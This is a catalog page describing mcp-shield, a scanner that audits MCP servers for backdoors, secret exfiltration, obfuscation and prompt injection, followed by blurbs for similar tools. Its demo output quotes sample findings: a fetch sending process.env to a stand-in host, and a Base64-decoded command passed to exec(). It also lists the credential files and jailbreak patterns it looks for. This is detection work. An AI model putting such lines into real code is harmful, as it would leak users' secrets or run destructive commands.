muhannad-hash/mcp-shield

muhannad-hash/mcp-shield

от muhannad-hash
mcp-shield - сканер безопасности MCP-серверов, выявляющий бэкдоры, утечки данных, инъекции промптов и риски цепочки поставок. Позволяет аудировать npm-пакеты или локальные директории перед подключе...

mcp-shield

A security scanner for MCP servers — detect backdoors, exfiltration, prompt injection, and supply chain risks before they reach your AI.

The MCP ecosystem is growing fast. Not every server on npm is safe. mcp-shield lets Claude audit any MCP server — local or from npm — before you trust it with your files, keys, and context.


What it detects

Category Examples
Exfiltration process.env sent over network, SSH key access, AWS credential reads
Code execution eval(), new Function(), child_process.exec(), dynamic require()
Obfuscation Base64 runtime decoding, hex-encoded payloads, char-code arrays
Sensitive file access .env, id_rsa, browser cookies, ~/.gitconfig
Prompt injection Hidden instructions, zero-width characters, role-switch attacks, jailbreak patterns
Supply chain Package age, download count, maintainer count, CVEs in dependencies

Demo

You: Scan the npm package "some-sketchy-mcp-server" before I install it

Claude (using scan_package):
  ## mcp-shield scan: some-sketchy-mcp-server
  Verdict: DANGEROUS | Findings: 2 critical, 1 high

  ### Code Findings

  #### index.js
  - [CRITICAL] [EXF004] process.env sent over network — possible credential exfiltration (line 47)
    fetch("https://collect.example.com/data", { body: JSON.stringify(process.env) })

  - [CRITICAL] [OBF001] Base64 decode at runtime — decoded content not inspectable (line 12)
    const cmd = Buffer.from("cm0gLXJm...", "base64").toString()

  - [HIGH]     [EXEC004] child_process exec/spawn — shell command execution (line 13)
    exec(cmd)

  ### Supply Chain
  | Published     | 2 days ago       |
  | Downloads/wk  | 3                |
  | Trust Score   | 15/100 — RISKY   |
  Flags:
  - Package published less than 7 days ago
  - Very low weekly downloads (<100)
У этого сервера пока нет списка инструментов.

Похожие MCP-сервера

alberthild/shieldapi-mcp

alberthild/shieldapi-mcp

MCP-сервер для безопасности AI-агентов: детекция промпт-инъекций, сканирование навыков на уязвимости цепочки поставок, проверка URL, паролей, email и IP. Бесплатно 10 вызовов в день без регистрации...

JavaScript1
muhannad-hash/git-context-mcp

muhannad-hash/git-context-mcp

MCP-сервер, который по файлу и диапазону строк находит коммит, PR и связанные issues через git blame и GitHub API — всё прямо в Claude. Разработчикам: вместо ручного поиска получаете контекст кода ...

JavaScript2
GUCCI-atlasv/skillssafe-mcp

GUCCI-atlasv/skillssafe-mcp

MCP сервер SkillsSafe сканирует SKILL.md и конфиги на угрозы: кражу данных, prompt-инъекции, shell-инъекции. Бесплатный инструмент без регистрации для защиты AI-агентов. Полезен разработчикам, рабо...

JavaScript1
jnMetaCode/shellward

jnMetaCode/shellward

ShellWard - шлюз безопасности и комплаенса для AI-агентов в Китае. Сканирует проекты на риски (网安法/PIPL/等保) и блокирует инъекции, утечку данных, опасные команды. Поддержка китайских PII, нулевые за...

TypeScript133
ofershap/mcp-server-npm-plus

ofershap/mcp-server-npm-plus

MCP сервер для анализа npm-пакетов: поиск, размер бандла, уязвимости, сравнение загрузок и дерево зависимостей. Без ключей, через публичные API — незаменим при выборе библиотеки в редакторе.

TypeScript1
shyshlakov/pci-dss-mcp

shyshlakov/pci-dss-mcp

MCP-сервер статического анализа Go-кода платежных сервисов. Детектирует нарушения PCI DSS v4.0.1 с привязкой к требованиям. Запускает 12 сканеров и AI-триаж — помогает разработчикам блокировать уязвимости до релиза.

Go3
© Каталог MCP, 2026. Все права защищены.
Проект не аффилирован с Anthropic и любыми упомянутыми продуктами.
Все названия и торговые марки принадлежат их владельцам.
Контакты для связи: hi@mcp-katalog.ru

Лука Никитин